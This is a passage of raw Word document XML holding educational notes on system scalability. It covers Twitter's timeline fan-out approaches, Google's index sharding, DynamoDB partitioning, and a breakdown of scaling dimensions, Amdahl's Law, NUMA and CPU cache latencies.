        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Twitter's Timeline (Fan-out Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6BEF67" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When a user with 50M followers tweets, how do 50M timelines update?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC1536" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach 1 — Fan-out on read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956ADCF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Tweets stored once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5694F9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>When a user loads their timeline, query all accounts they follow, merge tweets, sort by time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9DE5D4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Problem: This query is expensive (may follow 1,000 accounts). Doesn't scale for reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D86D9E5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach 2 — Fan-out on write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196204FA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>When someone tweets, push the tweet into every follower's timeline cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065BC0A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Reading timeline = just read from cache (fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBC7F1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Problem: Celebrity tweets trigger 50M cache writes. Massive write amplification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25622924" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Twitter's actual solution — Hybrid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D11395" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>For regular users (&lt; 10K followers): fan-out on write. Pre-compute timelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE91C3D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>For celebrities (&gt; 10K followers): fan-out on read. Merge their tweets at read time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ED1338" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Timeline = pre-computed cache + on-the-fly merge of celebrity tweets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53073AFC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Search (Index Scalability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576EC81C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The web index is sharded across thousands of machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFCFF5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each shard holds a portion of the index (document range).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9D886" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A query goes to ALL shards in parallel (scatter-gather).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77546372" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Results are merged, ranked, and returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B77F34A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding more shards = more capacity for index size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD46DC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding more replicas per shard = more query throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F542BD4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amazon DynamoDB (Automatic Scalability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B224FE9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Tables start on a single partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E608D11" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>As data/traffic grows, partitions automatically split.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79107C8B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each partition handles ~3,000 RCU / 1,000 WCU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0886E99E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Millions of partitions across a table is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD1576" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Users never manage sharding — it's fully automatic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED1927" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adaptive capacity: if one partition is hot, DynamoDB automatically gives it more throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DC9E9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757AFEE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="017A73B6">
          <v:rect id="_x0000_i2421" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0537D1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Scalability Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353B3E98" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scalability is not "add more servers." That is a solution, not a definition. Scalability is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>property of a system to maintain or improve its performance-to-cost ratio as load increases.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The operative word is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ratio</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — a system that handles 10x traffic by spending 100x money is not scalable, it's expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD15D3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>The internal engineering challenge of scalability is this: </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>every resource in a computer system has a saturation point</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — CPU cycles, memory bandwidth, disk IOPS, network throughput, file descriptors, mutex lock contention, connection pool slots. Scalability engineering is the discipline of continuously identifying which resource is the current bottleneck, pushing that ceiling outward, then finding and pushing the next bottleneck. It is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iterative process of bottleneck elimination</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>, not a one-time architectural decision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B19DF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>There is also a deeper problem: distributed systems — which are the foundation of horizontal scaling — introduce </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fundamental constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> that single-machine systems don't have. Network latency is non-deterministic. Clocks are not synchronized. Nodes fail independently. Messages can be lost, delayed, or duplicated. Every scalability pattern is ultimately a technique for </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>managing these constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> while maintaining useful system behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C27CD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="51B5BCFF">
          <v:rect id="_x0000_i2422" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCFA842" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Scalability Dimensions — What You're Actually Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2876BC14" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Before scaling anything, you must identify </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what dimension of load</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> you're scaling against. Systems can be stressed along multiple axes simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A0568" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request Volume (throughput):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Requests per second. The most common dimension. A system handling 1,000 RPS needs fundamentally different architecture than one handling 1,000,000 RPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E652F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Volume:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Total bytes stored. A database with 1TB of data has different characteristics than one with 1PB. Index sizes, query planner behavior, backup/restore times, and replication lag all change as data grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CA666" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Simultaneous in-flight requests. High concurrency with low throughput (many long-running requests) stresses thread pools and connection pools differently than high throughput with low concurrency (many short requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8674D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geographic Distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Users in multiple continents. A system optimized for users in one region may have unacceptable latency for users 15,000km away. Speed of light imposes hard physical limits — a round trip from New York to Tokyo is ~150ms minimum regardless of how fast your servers are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFE36B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read/Write Ratio:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A system with 99% reads and 1% writes scales completely differently than one with 50/50. Read-heavy systems can scale with caching and read replicas. Write-heavy systems require sharding or write-optimized storage engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C44FAB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>These dimensions interact in non-obvious ways.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A system optimized for high read throughput (aggressive caching) may perform terribly under high write volume (cache invalidation storms). Understanding which dimensions are under pressure — and how they interact — is the prerequisite to choosing the right scaling strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20313E1F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="44205F19">
          <v:rect id="_x0000_i2423" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28ED6D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Vertical Scaling — The Physics of a Single Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692930FB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU Scaling Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C490AD6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding CPU cores only helps if your workload is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parallelizable</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. This is governed by </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amdahl's Law</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4931A509" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10951653" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Speedup = 1 / (S + (1-S)/N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42862FA4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B"/>
    <w:p w14:paraId="30DE76FA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>S = fraction of work that is strictly sequential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61872AD6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>N = number of processors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198341AA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>If 20% of your program is sequential (S=0.2) and you add infinite cores, the maximum theoretical speedup is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5x</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. You hit the ceiling of the sequential portion. This is why raw core count eventually stops helping — every program has sequential bottlenecks (locking, coordination, I/O).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7ADC24" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The practical implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Single-threaded performance (clock speed, IPC — Instructions Per Clock) often matters more than core count for many workloads. A database running a complex query on a single thread benefits more from a faster core than from 128 slower cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C3290" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NUMA (Non-Uniform Memory Access):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> On multi-socket servers, each CPU socket has </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local RAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> directly attached to it. Accessing remote RAM (attached to a different socket) pays a latency penalty of </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>~40–100ns</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> compared to ~4ns for local RAM access. This seems small but at scale — millions of memory accesses per second — NUMA effects severely degrade performance if not managed. High-performance databases (Oracle, SQL Server) pin processes to specific NUMA nodes and allocate memory from that node's local pool. Linux's numactl tool enforces this. Ignoring NUMA on a 4-socket server can cause </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>50% throughput degradation</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530C7DDA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU Cache Hierarchy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve"> L1 cache (~32KB, ~1ns access), L2 (~256KB, ~4ns), L3 (~8–32MB shared, ~10–40ns), RAM (~50–100ns), NVMe SSD (~100µs), spinning disk (~10ms). </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>300,000x latency difference</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> between L1 cache and disk access is the fundamental reason data structures and algorithms matter for scalability. Cache-friendly data layouts (sequential memory access, struct-of-arrays vs array-of-structs) can produce </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10x performance differences</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> on modern hardware. A B-Tree traversal causes pointer-chasing across memory — each node access is a potential cache miss. This is why columnar stores (Parquet, ORC) dramatically outperform row stores for analytical queries — sequential column reads are maximally cache-friendly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144EF3C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9A9EDF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>More RAM primarily benefits systems through </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
